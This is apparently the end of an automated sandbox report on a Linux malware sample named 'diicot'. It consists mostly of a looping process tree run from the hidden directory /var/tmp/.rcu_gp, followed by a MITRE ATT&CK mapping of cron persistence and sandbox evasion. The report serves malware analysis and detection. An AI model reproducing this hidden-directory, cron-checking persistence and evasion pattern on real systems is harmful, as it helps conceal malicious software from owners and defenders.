    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7511
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7512
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7513
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7514
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7515
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7516
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7517
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7518
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7519
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7520
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7521
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7522
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7523
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7524
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7525
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7526
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7527
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7528
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7529
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7531
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7530
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7532
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7533
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7534
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:7535
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7536
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7537
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7538
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7539
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7540
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7541
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7542
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7543
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7544
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7545
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7546
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7547
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7548
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7549
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7550
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7553
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7554
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7555
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7556
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7557
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7558
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7559
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7560
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7561
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7562
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7563
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7564
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7565
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7566
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7567
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7568
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7569
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7570
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7571
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7572
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7573
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7574
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7575
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7576
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7577
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7578
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:7579
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7580
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7581
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7582
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7583
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7584
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7585
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7586
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7587
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7588
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7589
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7590
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7591
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7592
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7593
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7594
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7595
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7596
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7597
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7598
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7599
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7600
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7601
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7602
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7603
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7604
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7605
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7606
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7607
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7608
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7609
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7610
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7611
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7612
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7613
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7614
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7615
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7616
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7617
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7618
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7619
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7620
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7621
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7622
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7623
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7624
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7625
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7626
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7627
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7628
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7629
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7630
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7631
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7632
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7633
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7635
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7634
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7636
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7637
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7638
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7639
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7640
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7641
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7642
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7643
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7644
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:7645
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7646
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7647
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7648
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7649
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7650
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:7651
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7652
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7653
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7654
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7655
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7656
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7657
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7658
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7659
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7660
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7661
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  PID:7662
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:7663
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:7664
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:7665
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:7666
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:7667

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:7333

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks